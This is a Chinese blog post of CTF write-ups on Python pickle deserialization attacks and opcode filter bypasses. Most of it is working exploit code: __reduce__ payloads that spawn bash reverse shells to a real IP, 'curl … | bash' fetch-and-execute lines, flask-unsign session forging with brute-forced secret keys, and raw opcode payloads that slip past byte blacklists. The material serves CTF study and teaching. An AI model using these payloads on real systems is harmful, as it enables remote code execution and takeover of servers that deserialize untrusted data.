CTF题型 Python中pickle反序列化进阶利用&例题&opache绕过

于 2024-09-04 21:46:35 发布
阅读量1.1k 收藏 18
点赞数 26
文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_86640358/article/details/141905074
版权

一.基础的pickle反序列化

pickle反序列化危害极大,不像php反序列化依赖恶意类和方法,而是直接可以RCE

关键代码

pickle.dumps(obj[, protocol])

功能:将obj对象序列化为string形式,而不是存入文件中。
参数:
obj:想要序列化的obj对象。
protocal:如果该项省略,则默认为0。如果为负值或HIGHEST_PROTOCOL,则使用最高的协议版本。

pickle.loads(string)

功能:从string中读出序列化前的obj对象。
参数:
string:文件名称。

漏洞有关的魔术方法
__reduce__

构造方法,在反序列化的时候自动执行,类似于php中的_wake_up

__setstate__

在反序列化时自动执行。它可以在对象从其序列化状态恢复时,对对象进行自定义的状态还原。

常用payload(没有os模块)

import pickle
import base64
 
class A(object):
    def \_\_reduce\_\_(self):
        return (eval, ("\_\_import\_\_('os').popen('tac /flag').read()",))
    
a = A()
a = pickle.dumps(a)
print(base64.b64encode(a))

环境有os模块

import pickle
import os
import base64

class aaa():
    def \_\_reduce\_\_(self):
        return(os.system,('bash -c "bash -i >& /dev/tcp/ip/port 0>&1"',))

a= aaa()

payload=pickle.dumps(a)

payload=base64.b64encode(payload)
print(payload)

#注意payloads生成的shell脚本需要在目标机器操作系统上执行,否则会报错

所以最好所有poc在linux上生成

例题

1.[HFCTF 2021 Final]easyflask

https://buuoj.cn/challenges#[HFCTF%202021%20Final]easyflask

非预期(任意文件读取)

image-20240325085226157

直接读环境变量/proc/1/environ

image-20240325085331374

预期解

app源码


#!/usr/bin/python3.6
import os
import pickle

from base64 import b64decode
from flask import Flask, request, render_template, session

app = Flask(__name__)
app.config["SECRET\_KEY"] = "\*\*\*\*\*\*\*"

User = type('User', (object,), {
    'uname': 'test',
    'is\_admin': 0,
    '\_\_repr\_\_': lambda o: o.uname,
})


@app.route('/', methods=('GET',))
def index\_handler():
    if not session.get('u'):
        u = pickle.dumps(User())
        session['u'] = u
    return "/file?file=index.js"


@app.route('/file', methods=('GET',))
def file\_handler():
    path = request.args.get('file')
    path = os.path.join('static', path)
    if not os.path.exists(path) or os.path.isdir(path) \
            or '.py' in path or '.sh' in path or '..' in path or "flag" in path:
        return 'disallowed'

    with open(path, 'r') as fp:
        content = fp.read()
    return content


@app.route('/admin', methods=('GET',))
def admin\_handler():
    try:
        u = session.get('u')
        if isinstance(u, dict):
            u = b64decode(u.get('b'))
        u = pickle.loads(u)
    except Exception:
        return 'uhh?'

    if u.is_admin == 1:
        return 'welcome, admin'
    else:
        return 'who are you?'


if __name__ == '\_\_main\_\_':
    app.run('0.0.0.0', port=80, debug=False)

直接读环境变量/proc/1/environ

发现 secret_key=glzjin22948575858jfjfjufirijidjitg3uiiuuh

可以直接伪造secret_key

image-20240325092958651

漏洞代码

@app.route('/admin', methods=('GET',))
def admin\_handler():
    try:
        u = session.get('u')
        if isinstance(u, dict):
            u = b64decode(u.get('b'))
        u = pickle.loads(u)
    except Exception:
        return 'uhh?'

伪造session实现 读取 u 中的 b值

对b中的值进行反序列化,可以直接触发RCE

>flask-unsign --sign --cookie "{'u':{'b':'payload'}}" --secret "glzjin22948575858jfjfjufirijidjitg3uiiuuh"

在linux系统下运行

import os
import pickle
import base64
User = type('User', (object,), {
    'uname': 'test',
    'is\_admin': 0,
    '\_\_repr\_\_': lambda o: o.uname,
    '\_\_reduce\_\_': lambda o: (os.system, ('bash -c "bash -i >& /dev/tcp/148.135.82.190/8888 0>&1"',))
})
user=pickle.dumps(User())
print(base64.b64encode(user).decode())

生成后伪造

image-20240325093400538

用hackerbar发cookie触发

image-20240325093456429

可以反弹shell

2.[0xgame 2023 Notebook]

当时环境是给了源码

from flask import Flask, request, render_template, session
import pickle
import uuid
import os

app = Flask(__name__)
app.config['SECRET\_KEY'] = os.urandom(2).hex()

class Note(object):
    def \_\_init\_\_(self, name, content):
        self._name = name
        self._content = content

    @property
    def name(self):
        return self._name
    
    @property
    def content(self):
        return self._content


@app.route('/')
def index():
    return render_template('index.html')


@app.route('/<path:note\_id>', methods=['GET'])
def view\_note(note_id):
    notes = session.get('notes')
    if not notes:
        return render_template('note.html', msg='You have no notes')
    
    note_raw = notes.get(note_id)
    if not note_raw:
        return render_template('note.html', msg='This note does not exist')
    
    note = pickle.loads(note_raw)
    return render_template('note.html', note_id=note_id, note_name=note.name, note_content=note.content)


@app.route('/add\_note', methods=['POST'])
def add\_note():
    note_name = request.form.get('note\_name')
    note_content = request.form.get('note\_content')

    if note_name == '' or note_content == '':
        return render_template('index.html', status='add\_failed', msg='note name or content is empty')
    
    note_id = str(uuid.uuid4())
    note = Note(note_name, note_content)

    if not session.get('notes'):
        session['notes'] = {}
    
    notes = session['notes']
    notes[note_id] = pickle.dumps(note)
    session['notes'] = notes
    return render_template('index.html', status='add\_success', note_id=note_id)


@app.route('/delete\_note', methods=['POST'])
def delete\_note():
    note_id = request.form.get('note\_id')
    if not note_id:
        return render_template('index.html')
    
    notes = session.get('notes')
    if not notes:
        return render_template('index.html', status='delete\_failed', msg='You have no notes')
    
    if not notes.get(note_id):
        return render_template('index.html', status='delete\_failed', msg='This note does not exist')
    
    del notes[note_id]
    session['notes'] = notes
    return render_template('index.html', status='delete\_success')


if __name__ == '\_\_main\_\_':
    app.run(host='0.0.0.0', port=8000, debug=False)

题目分析:

app.config['SECRET_KEY'] = os.urandom(2).hex()

secret_key是弱密钥可以爆破 进行伪造

@app.route('/<path:note\_id>', methods=['GET'])
def view\_note(note_id):
    notes = session.get('notes')
    if not notes:
        return render_template('note.html', msg='You have no notes')
    
    note_raw = notes.get(note_id)
    if not note_raw:
        return render_template('note.html', msg='This note does not exist')
    
    note = pickle.loads(note_raw)
    return render_template('note.html', note_id=note_id, note_name=note.name, note_content=note.content)

session伪造的结构{‘notes’:{‘note_id’:‘payload’}}

/<path:note_id> 路由下

pickle.loads 触发反序列化

题目环境有os可以用os.system执行任意命令

具体操作

生成爆破密钥

import os
while True:
    secret_key=os.urandom(2).hex()
    with open("Desktop/secret\_key.txt","a") as f:
        f.write(secret_key+'\n')

解析session

C:\Users\Administrator>flask-unsign --decode --cookie ".eJwtysEKgjAYAOBXid0HbdPWhA5rKI3IQ9M0b_7mrJgWFBnI3r2CvvM3oeH2bB8omhBfCAi5tZidOMMBYzVeEtJiCk0tKOOkYeL3ZoAi1ElzSDv5p3YqERaK5A5OWKfHOOvFvKpM5lS_dhuab_WYlDQ8Q1HkVxm_v0eXNH3BsHcwmLyWFTleghXy3n8AceAtDQ.ZgDvKw.7CbLZz_NzrKo8ZunE1HPgPKH6U0"
C:\Users\Administrator\AppData\Local\Programs\Python\Python310\lib\site-packages\requests\__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.18) or chardet (5.2.0)/charset_normalizer (2.0.12) doesn't match a supported version!
  warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
{'notes': {'769b57ff-3d73-433a-811e-2bca92371c39': b'\x80\x04\x956\x00\x00\x00\x00\x00\x00\x00\x8c\x08__main__\x94\x8c\x04Note\x94\x93\x94)\x81\x94}\x94(\x8c\x05_name\x94\x8c\x011\x94\x8c\x08_content\x94h\x06ub.'}}

爆破 secret_key

flask-unsign --unsign --cookie ".eJwtysEKgjAYAOBXid0HbdPWhA5rKI3IQ9M0b_7mrJgWFBnI3r2CvvM3oeH2bB8omhBfCAi5tZidOMMBYzVeEtJiCk0tKOOkYeL3ZoAi1ElzSDv5p3YqERaK5A5OWKfHOOvFvKpM5lS_dhuab_WYlDQ8Q1HkVxm_v0eXNH3BsHcwmLyWFTleghXy3n8AceAtDQ.ZgDvKw.7CbLZz_NzrKo8ZunE1HPgPKH6U0" -w "C:\Users\Administrator\Desktop\secret_key.txt"  --no-literal-eval

image-20240325113320643

拿到 f991

linux下运行 题目环境有os模块

import pickle
import os
import base64

class aaa():
    def \_\_reduce\_\_(self):
        return(os.system,('curl ip/1 |bash',))

a= aaa()

payload=pickle.dumps(a)
print(payload)

image-20240325113542122

利用 curl 反弹shell(适用于bash/zsh) 拿到payloadb'\x80\x04\x957\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x1ccurl 148.135.82.190/2 | bash\x94\x85\x94R\x94.'

要伪造的session{'notes':{'769b57ff-3d73-433a-811e-2bca92371c39':b'\x80\x04\x957\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x1ccurl 148.135.82.190/2 | bash\x94\x85\x94R\x94.'}}

flask-unsign --sign --cookie "{'notes':{'769b57ff-3d73-433a-811e-2bca92371c39':b'\x80\x04\x957\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x1ccurl 148.135.82.190/2 | bash\x94\x85\x94R\x94.'}}" --secret "f991"

image-20240325122756770

image-20240325122818244

可以弹回shell

image-20240325122844869

3.[HZNUCTF 2023 preliminary]pickle

import base64
import pickle
from flask import Flask, request

app = Flask(__name__)


@app.route('/')
def index():
    with open('app.py', 'r') as f:
        return f.read()


@app.route('/calc', methods=['GET'])
def getFlag():
    payload = request.args.get("payload")
    pickle.loads(base64.b64decode(payload).replace(b'os', b''))
    return "ganbadie!"


@app.route('/readFile', methods=['GET'])
def readFile():
    filename = request.args.get('filename').replace("flag", "????")
    with open(filename, 'r') as f:
        return f.read()


if __name__ == '\_\_main\_\_':
    app.run(host='0.0.0.0')

非预期

/readFile?filename=/proc/1/environ

flag在环境变量里

预期 关键代码

@app.route('/calc', methods=['GET'])
def getFlag():
    payload = request.args.get("payload")
    pickle.loads(base64.b64decode(payload).replace(b'os', b''))
    return "ganbadie!"

将os替换为空

用没有os的payload

import pickle
import base64
 
class A(object):
    def \_\_reduce\_\_(self):
        return (eval, ("\_\_import\_\_('o'+'s').popen('curl 148.135.82.190/2 | bash').read()",))
    
a = A()
a = pickle.dumps(a)
print(base64.b64encode(a))

直接反弹shell

image-20240325134423813

image-20240325134508301

二.基于opcode绕过字节码过滤

对于一些题会对传入的数据进行过滤

例如

1.if b'R' in code or b'built' in code or b'setstate' in code or b'flag' in code

2.a = base64.b64decode(session.get('ser_data')).replace(b"builtin", b"BuIltIn").replace(b"os", b"Os").replace(b"bytes", b"Bytes") if b'R' in a or b'i' in a or b'o' in a or b'b' in a:

这个时候考虑用用到opcode
Python中的pickle更像一门编程语言,一种基于栈的虚拟机

什么是opcode

Python 的 opcode(operation code)是一组原始指令,用于在 Python 解释器中执行字节码。每个 opcode都是是一个标识符,代表一种特定的操作或指令。
在 Python 中,源代码首先被编译为字节码,然后由解释器逐条执行字节码指令。这些指令以 opcode 的形式存储在字节码对象中,并由Python 解释器按顺序解释和执行。

每个 opcode 都有其特定的功能,用于执行不同的操作,例如变量加载、函数调用、数值运算、控制流程等。Python 提供了大量的
opcode,以支持各种操作和语言特性。

INST i、OBJ o、REDUCE R 都可以调用一个 callable 对象

如何编写

原理建议直接参考https://xz.aliyun.com/t/7436?time__1311=n4%2BxnD0G0%3Dit0Q6qGNnmjYeeiKDtD9DcjlYD#toc-11

没有比这篇先知文章写的更好的

辅助生成工具pker:https://github.com/eddieivan01/pker

一般用于绕过 find_class 黑名单/白名单限制

pker用法

GLOBAL
对应opcode:b’c’
获取module下的一个全局对象(没有import的也可以,比如下面的os):
GLOBAL(‘os’, ‘system’)
输入:module,instance(callable、module都是instance)

INST
对应opcode:b’i’
建立并入栈一个对象(可以执行一个函数):
INST(‘os’, ‘system’, ‘ls’)
输入:module,callable,para

OBJ
对应opcode:b’o’
建立并入栈一个对象(传入的第一个参数为callable,可以执行一个函数)):
OBJ(GLOBAL(‘os’, ‘system’), ‘ls’)
输入:callable,para

xxx(xx,…)
对应opcode:b’R’
使用参数xx调用函数xxx(先将函数入栈,再将参数入栈并调用)

li[0]=321

globals_dic[‘local_var’]=‘hello’
对应opcode:b’s’
更新列表或字典的某项的值

xx.attr=123
对应opcode:b’b’
对xx对象进行属性设置

return
对应opcode:b’0’
出栈(作为pickle.loads函数的返回值):
return xxx # 注意,一次只能返回一个对象或不返回对象(就算用逗号隔开,最后也只返回一个元组)

对于做题而言会opache改写就行了

INST i、OBJ o、REDUCE R 都可以调用一个 callable 对象

RCE demo:

R:
b'''cos\nsystem\n(S'whoami'\ntR.'''


i
b'''(S'whoami'\nios\nsystem\n.'''



o
b'''(cos\nsystem\nS'whoami'\no.'''

无R,i,o os可过
b'''(cos\nsystem\nS'calc'\nos.'''


无R,i,o os 可过  + 关键词过滤
b'''(S'key1'\nS'val1'\ndS'vul'\n(cos\nsystem\nVcalc\nos.'''
V操作码是可以识别\u (unicode编码绕过)
特别是命令有特殊功能字符

易错点 \n是换行如果用赛博厨子 会将 \n 当作字符处理,易出错

用python处理

import base64
opcode=b''''''
print(base64.b64encode(opcode))

例题

4.[MTCTF 2022]easypickle

当时题目环境给了源码的

import base64
import pickle
from flask import Flask, session
import os
import random

app = Flask(__name__)
app.config['SECRET\_KEY'] = os.urandom(2).hex()

@app.route('/')
def hello\_world():
    if not session.get('user'):
        session['user'] = ''.join(random.choices("admin", k=5))
    return 'Hello {}!'.format(session['user'])


@app.route('/admin')
def admin():
    if session.get('user') != "admin":
        return f"<script>alert('Access Denied');window.location.href='/'</script>"
    else:
        try:
            a = base64.b64decode(session.get('ser\_data')).replace(b"builtin", b"BuIltIn").replace(b"os", b"Os").replace(b"bytes", b"Bytes")
            if b'R' in a or b'i' in a or b'o' in a or b'b' in a:
                raise pickle.UnpicklingError("R i o b is forbidden")
            pickle.loads(base64.b64decode(session.get('ser\_data')))
            return "ok"
        except:
            return "error!"


if __name__ == '\_\_main\_\_':
    app.run(host='0.0.0.0', port=8888)

decode一下session

image-20240325193053142

os.urandom(2).hex() 爆破session

image-20240326084806581

爆破密钥为 dabe

CTF-rootme 题解之Python - pickle
weixin_30652879的博客
03-28 807
LINK:https://www.root-me.org/en/Challenges/App-Script/Python-pickle Referrence:https://github.com/Djazouli/RootMeHelp/blob/06d4ad358f43217c12dc8a36dc41ef9cea787f69/AppScript/Python_pickle.md  ...
python 重定向 ctf_CTF-rootme 题解之Python - pickle
weixin_33740713的博客
01-28 509
Read a pickled object hierarchy from a bytes object and return the reconstituted object hierarchy specified therein.The protocol version of the pickle is detected automatically, so no protocol argumen...
一文掌握CTFPython全部考点
黑战士的博客
07-22 1899
pyc文件是py文件编译后生成的字节码文件(byte code),pyc文件经过python解释器最终会生成机器码运行。因此pyc文件是可以跨平台部署的,类似Java的.class文件,一般py文件改变后,都会重新生成pyc文件。
pickle_Pickle Rick CTF撰写
weixin_26722031的博客
07-30 430
pickleThis writeup documents my approach to solving the “Pickle Rick” Capture The Flag (CTF) room available on the TryHackMe platform for free to members. The TryHackMe platform is an excellent place ...
python安全之Pickle反序列化漏洞学习。
Mrs_H的博客
10-28 2309
前言 写这篇文章的起因是两次遇到python pickle的题目都只做到了命令执行的程度,但都没有反弹shell。看别人的wp都是通过curl将flag拉到vps上的,怎么说呢,死于没有公网IP。虽然之前在做题的时候,照着网上的exp可以把自己的payload改个七七八八,但是说实话我距离真正意义上的“手撸”opcode还是有着一段距离。这篇文章主要还是通过我所遇到的pickle反序列化题目出发进行编写,当然也少不了pickle的原理部分。 正文 在正式开始这篇文章之前,我想先贴出一位大佬的文章Pion1e
CTF题型 Pythonpickle反序列化进阶利用&amp例题&ampopache绕过(2)
m0_61408947的博客
04-28 871
现在能在网上找到很多很多的学习资源,有免费的也有收费的,当我拿到1套比较全的学习资源之前,我并没着急去看第1节,我而是去审视这套资源是否值得学习,有时候也会去问一些学长的意见,如果可以之后,我会对这套学习资源做1个学习计划,我的学习计划主要包括规划图和学习进度表。分享给大家这份我薅到的免费视频资料,质量还不错,大家可以跟着学习。V操作码是可以识别\u (unicode编码绕过)无R,i,o os 可过 + 关键词过滤。特别是命令有特殊功能字符。无R,i,o os可过。
CTF题型 Pythonpickle反序列化进阶利用&amp例题&ampopache绕过(1)
2401_84009579的博客
04-20 1098
机构动则几千的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**
CTFPython考点 SSTI&反序列化&字符串
qi_SJQ_的博客
03-01 4085
ctf题型分类: 1.CTFPython—支付逻辑&amp;JWT&amp;反序列化: 题目:2019 CISCN 华北赛区Day1 Web2(全国大学生信息安全竞赛) 先写个爆破请求脚本,爬取请求到内容页面哪个存在lv6图片,得到在181页: 或者这个脚本,都可以: import requests url = "http://web44.buuoj.cn/" for i in range(1, 2000): r = requests.get(url + "shop?page=" + st
Python pickle 反序列化详解
m0_65129142的博客
12-16 3089
什么是Python反序列化 python反序列化和php反序列化类似(还没接触过java。。),相当于把程序运行时产生的变量,字典,对象实例等变换成字符串形式存储起来,以便后续调用,恢复保存前的状态 python反序列化的库主要有两个,pickle和cPickle,这俩除了运行效率上有区别外,其他没啥区别 pickle的常用方法有 import pickle a_list = [‘a’,‘b’,‘c’] pickle构造出的字符串,有很多个版本。在dumps或loads时,可以用Protocol参数指定协
第85天:CTF夺旗-JAVA考点反编译&amp;XXE&amp;反序列化1
08-03
【Java CTF夺旗:反编译、XXE与反序列化详解】 在网络安全领域,尤其是CTF(Capture The Flag)竞赛,Java技术经常成为关键考点,涉及到的知识点包括但不限于反编译、XXE(XML External Entity)攻击、反序列化...
bfengj#CTF#thinkphp5.0.24反序列化rce1
07-25
thinkphp5.0.24反序列化rceModel是抽象类protected $append = [];// $value值,作为call函数引用的第二变量p
100天精通Python丨黑科技篇 —— 21、大语言模型_100天精通python快速入门到黑科技
m0_60452141的博客
04-26 761
ChatGPT 是 OpenAI 推出的一种基于 GPT-3/4 的聊天机器人。chatgpt 的颠覆性影响主要体现在提高语言交流的便捷性、个性化服务、自动化客服和教育娱乐等方面,这些应用可以为用户带来更多的便利和乐趣,同时也为企业提供了更多的服务和商机。本文收录于,是由的硬核博主倾力打造,分基础知识篇和黑科技应用两大部分,欢迎订阅本专栏,订阅后可私聊进Python全栈VIP交流群(问题解答、互相帮助)还可领取20GPython视频和100本互联网行业电子书。
python反序列化-[watevrCTF-2019]Pickle Store
snowlyzz的博客
09-01 963
详细讲解pickle
ctfphp反序列化汇总
2302_78903258的博客
07-19 1734
解题过程:首先需要找到最后的危险函数,看到了在Vox里面的include。然后想要使用include就要调用fun这个函数想要调用fun就要触发__invoke这个魔术方法__invoke() //当脚本尝试将对象调用为函数时触发作为函数就是添加了一个小括号去触发,发现在Petal类__get方法具备这个调用函数的功能,所以需要去触发__get这个方法。
PHP反序列化漏洞+CTF实例
最新发布
hyq99999的博客
08-09 1069
整理php序列化相关知识点以及在CTF的实例。
【网络安全 | CTF】记一次PHP序列化反序列化解题详析
等风来
08-24 4172
代码开门见山给出backdoor函数,而该函数在popko类的call方法调用故需要运行call方法而call方法是在对象上下文调用不可访问的方法时触发的故需要调用不可访问的方法 而恰巧destruct方法并不存在a对象和a函数故需要运行destruct方法而destruct方法在对象被销毁时触发 如何实现对象被销毁呢? 当序列化后的语句被反序列化之后,对象会被销毁,从而触发destruct方法 所以思路就是: 在pipimi类构造一个对象,当pipimi的destru
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值